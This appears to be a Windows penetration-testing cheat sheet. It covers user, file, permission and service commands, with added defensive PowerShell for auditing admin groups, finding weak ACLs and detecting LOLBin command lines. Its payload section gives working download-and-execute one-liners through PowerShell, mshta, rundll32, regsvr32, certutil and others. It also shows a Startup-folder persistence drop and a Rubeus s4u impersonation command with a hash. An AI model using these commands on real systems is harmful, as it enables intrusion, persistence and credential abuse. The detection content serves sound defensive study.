Windows General

User management

Create a new user and add it to the 'admin' group

# Run from PowerShell (';' chains commands there; in CMD chain them with '&' instead)
net user $USERNAME $PASSWORD /add ; net localgroup administrators $USERNAME /add

Create a new group

New-LocalGroup -Name "HR"
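The two commands above are exactly what an attacker with a foothold runs to persist, so the defensive counterpart is to audit who is in the local Administrators group and to watch the events that record changes to it. The following is an added example, not part of the original cheat sheet: it assumes Windows 10 / Server 2016 or later (for Get-LocalGroupMember), an allowlist you adjust to the host's baseline (the $Expected default is a placeholder), and an elevated session for reading the Security log.

```powershell
# Added example (not from the original cheat sheet): audit the local
# Administrators group against an allowlist and list recent membership changes.

function Get-UnexpectedLocalAdmin {
    param(
        [string[]]$Expected = @('Administrator'),   # assumed baseline, adjust per host
        [string]$Group = 'Administrators'
    )
    # Get-LocalGroupMember returns names as COMPUTER\user or DOMAIN\user;
    # compare on the part after the backslash
    Get-LocalGroupMember -Group $Group | Where-Object {
        $short = ($_.Name -split '\\')[-1]
        $Expected -notcontains $short
    } | Select-Object Name, ObjectClass, PrincipalSource
}

function Get-RecentLocalGroupChange {
    param([int]$Hours = 24)
    # 4720: a user account was created
    # 4732: a member was added to a security-enabled local group (e.g. Administrators)
    $filter = @{
        LogName   = 'Security'
        Id        = 4720, 4732
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ n = 'Summary'; e = { ($_.Message -split "`n")[0].Trim() } }
}

# Usage: anything not on the baseline, then the last day's account/group changes
Get-UnexpectedLocalAdmin -Expected @('Administrator', 'Domain Admins') | Format-Table -AutoSize
Get-RecentLocalGroupChange -Hours 24 | Format-Table -AutoSize
```

Event 4732 is only written when "Audit Security Group Management" is enabled in the audit policy; if the second function returns nothing on a host where you know a member was added, check that setting before concluding nothing happened.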

File and directory management

Download over SMB

# Start an SMB server on the attacking machine
### POWERSHELL on the target machine ###
# Connect to an SMB share
net use \\$RHOST\$SERVERNAME /user:$USERNAME $PASSWORD
# Transfer a file from local to remote
Copy-Item .\$FILE \\$RHOST\$SERVERNAME
# Check connected SMB shares
Get-SmbConnection

Download from a URL

Invoke-WebRequest -OutFile $FILEOUTPUT -Uri $URL

Permissions

# https://ss64.com/nt/icacls.html
# View permissions
icacls $FILE
# Grant permissions (full control, not recursive)
icacls c:\Users /grant joe:f
# Remove permissions
icacls c:\Users /remove joe
# Legend: inheritance flags
(CI): container inherit
(OI): object inherit
(IO): inherit only
(NP): do not propagate inherit
(I):  permission inherited from parent container
# Legend: access rights
F:  full access
D:  delete access
N:  no access
M:  modify access
RX: read and execute access
R:  read-only access
W:  write-only access

Manipulation, listing and creation

dir /a # List directory including hidden files
dir *.$EXTENSION # List files with a given extension
mkdir $DIR # Make directory
rmdir /s $DIR # Remove directory and contents
wmic logicaldisk get name # List all drives
$DRIVE: # Switch drive
tree # Folder structure
attrib # File attributes
attrib +h $FILE # Add a file attribute (here: hidden)
attrib -h $FILE # Remove a file attribute (here: hidden)
echo hello > $FILE # Create file on the fly
type $FILE # Read contents of a file
del $FILE # Delete file
echo hello > $FILE # Overwrite file text (1. file.txt = "hello")
echo world > $FILE # Overwrite file text (2. file.txt = "world")
echo hello > $FILE # Append to a file (1. file.txt = "hello")
echo world >> $FILE # Append to a file (2. file.txt = "hello" followed by "world" on a new line)
dir > $FILE # Command results to file
copy $FILE $DIR # Copy a file to a directory
xcopy $DIR1 $DIR2 # Copy contents from folder1 to folder2 (no sub-directories)
xcopy $DIR1 $DIR2 /s # Copy contents from folder1 to folder2 (inc sub-directories)
move $DIR1 $DIR2 # Move a directory, folder1 into folder2
rename $DIR_OLD $DIR_NEW # Rename a directory

Misc

cls # Clear CMD
command /? # Show help/options for a command
$FILE # Typing a file name opens it in its default program
path # Show environment path
color /? # List all available colours
color 0A # Change colours
color # Default colours

Disk management

Manage disks with Fdisk

# Enter the interactive tool (the commands below are diskpart's; fdisk.exe does not ship with current Windows)
diskpart
# list available disks
> list disk
# select the disk to operate on
> select disk 6
# list the partitions on that disk
> list partition
# delete the selected partition (needs a prior "select partition")
> delete partition override

Services

Get services

# Powershell
Get-Service | ? {$_.Status -eq "Running"} | select -First 2 | fl
# CMD
sc qc $SERVICE

Start/Stop services

# CMD (sc has no restart subcommand: stop, then start)
sc [stop/start] $SERVICE

Change a service's executable

# Note the mandatory space after "binPath="
sc config $SERVICE binPath= "$PATH_DEL_EJECUTABLE"

View a service's permissions

# Powershell
Get-ACL -Path HKLM:\System\CurrentControlSet\Services\wuauserv | Format-List
# CMD
sc sdshow $SERVICE
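The icacls legend in the Permissions section and the service commands above describe the two places where loose ACLs matter most: a directory where broad groups can write, and a service whose executable (or unquoted binPath) a low-privileged user can replace, which is what "sc config binPath=" is used for once a service is found writable. The following is an added example, not part of the original cheat sheet, serving both sections: it reports ACEs that grant write-class rights to broad principals for every file under a directory, then runs the same check on each service's binary. The principal list and the rights mask are this example's own choices.

```powershell
# Added example (not from the original cheat sheet): find ACEs that let broad
# principals write, for files under a directory and for service executables.

$BroadPrincipals = @(            # assumed list; extend for your environment
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Modify covers Write, WriteData, AppendData and Delete; FullControl includes Modify.
# The two raw bits are GENERIC_ALL and GENERIC_WRITE, which appear unresolved in some ACEs.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::Modify -bor 0x10000000 -bor 0x40000000

function Get-WeakAce {
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited      # the (I) flag in icacls output
        }
    }
}

function Find-WeakFileAcl {
    # Equivalent of reading "icacls $FILE" for every file under $Directory
    param([Parameter(Mandatory)][string]$Directory)
    Get-ChildItem -LiteralPath $Directory -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object { Get-WeakAce -Path $_.FullName }
}

function Get-ServiceExecutable {
    # Win32_Service.PathName is the raw binPath: a quoted path, or a path plus arguments
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Find-WeakServiceBinary {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        $exe = Get-ServiceExecutable -PathName $svc.PathName
        if (Test-Path -LiteralPath $exe) {
            Get-WeakAce -Path $exe | ForEach-Object {
                $_ | Add-Member -NotePropertyName Service -NotePropertyValue $svc.Name -PassThru
            }
        }
        # An unquoted binPath containing spaces is the other classic service weakness
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            [pscustomobject]@{
                Path = $exe; Principal = '(unquoted path with spaces)'
                Rights = $null; Inherited = $false; Service = $svc.Name
            }
        }
    }
}

# Usage (elevated session recommended so every file and service is readable)
Find-WeakFileAcl -Directory 'C:\Program Files' | Format-Table -AutoSize
Find-WeakServiceBinary | Format-Table -AutoSize
```

Inherited entries are usually fixed at the parent directory rather than file by file; the Inherited column tells you which of the two icacls commands above to run and where.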

Payload download and execution

Powershell

From an HTTP server

# V1 (works)
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.139:8000/power.ps1')"
# V2 (sometimes does not work)
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
# Download only
(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerUp.ps1", "C:\Windows\Temp\PowerUp.ps1")
Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
# Download and run Rubeus, with arguments
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
# Execute a specific method from an assembly
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

From a WebDAV server

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

CMD

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Cscript / Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Regasm / Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Certutil

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Bitsadmin

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
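Every one-liner in this section leaves a distinctive process command line, which is how they are caught in practice. The following is an added example, not part of the original cheat sheet: a set of regexes derived from the commands above, a function that tests a command line against them, sample lines constructed for the demonstration, and a reader for Sysmon event 1 / Security 4688. Rule names and regexes are this example's own and the event reader assumes an elevated session and that command-line auditing is enabled for 4688.

```powershell
# Added example (not from the original cheat sheet): match process command lines
# against the remote-download-and-execute patterns listed in this section.

$LolbinPatterns = [ordered]@{
    'powershell-download-cradle' = 'powershell.*(downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b).*(https?:|\\\\)'
    'powershell-webdav-file'     = 'powershell.*-f(ile)?\s+\\\\'
    'cmd-redirect-unc'           = 'cmd(\.exe)?\s+/k\s*<\s*\\\\'
    'cscript-wscript-remote'     = '[cw]script.*(https?:|\\\\)'
    'mshta-remote'               = 'mshta(\.exe)?\s+(vbscript:|javascript:|https?:|\\\\)'
    'rundll32-script-or-unc'     = 'rundll32.*(javascript:|\\\\\S+\.dll,)'
    'regasm-regsvcs-installutil' = '(regasm|regsvcs|installutil)(\.exe)?\s.*/u\b'
    'regsvr32-scriptlet'         = 'regsvr32.*/i:(https?:|\\\\).*scrobj\.dll'
    'odbcconf-regsvr'            = 'odbcconf.*/a\s*\{?\s*regsvr'
    'certutil-urlcache-or-decode'= 'certutil.*(-urlcache|-decode)'
    'bitsadmin-addfile'          = 'bitsadmin.*/addfile'
}

function Test-LolbinCommandLine {
    # Returns one object per rule that matches; nothing for a clean command line
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($name in $LolbinPatterns.Keys) {
        if ($CommandLine -match $LolbinPatterns[$name]) {
            [pscustomobject]@{ Rule = $name; CommandLine = $CommandLine }
        }
    }
}

function Get-LolbinEvent {
    # Pull command lines from Sysmon event 1 and Security 4688 and run the rules
    param([int]$Hours = 24)
    $filters = @(
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 },
        @{ LogName = 'Security'; Id = 4688 }
    )
    foreach ($f in $filters) {
        $f.StartTime = (Get-Date).AddHours(-$Hours)
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
            $time = $_.TimeCreated
            # Sysmon writes "CommandLine: ...", 4688 writes "Process Command Line: ..."
            if ($_.Message -match '(?m)^(?:Process )?Command ?Line:\s*(.+)$') {
                Test-LolbinCommandLine -CommandLine $Matches[1].Trim() |
                    Add-Member -NotePropertyName TimeCreated -NotePropertyValue $time -PassThru
            }
        }
    }
}

# Constructed sample command lines (the first four are taken from the cheat sheet above)
$SampleCommandLines = @(
    'mshta http://webserver/payload.hta',
    'regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll',
    'certutil -urlcache -split -f http://webserver/payload.b64 payload.b64',
    'powershell "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.139:8000/power.ps1'')"',
    'notepad.exe C:\Users\joe\notes.txt'   # benign control line, matches no rule
)
$SampleCommandLines | ForEach-Object { Test-LolbinCommandLine -CommandLine $_ } | Format-Table -AutoSize

# Live data: Get-LolbinEvent -Hours 24 | Format-Table -AutoSize
```

The certutil and bitsadmin rules will also fire on legitimate administration (certificate retrieval, Windows Update transfers), so in a real deployment filter on the parent process and the destination host before alerting.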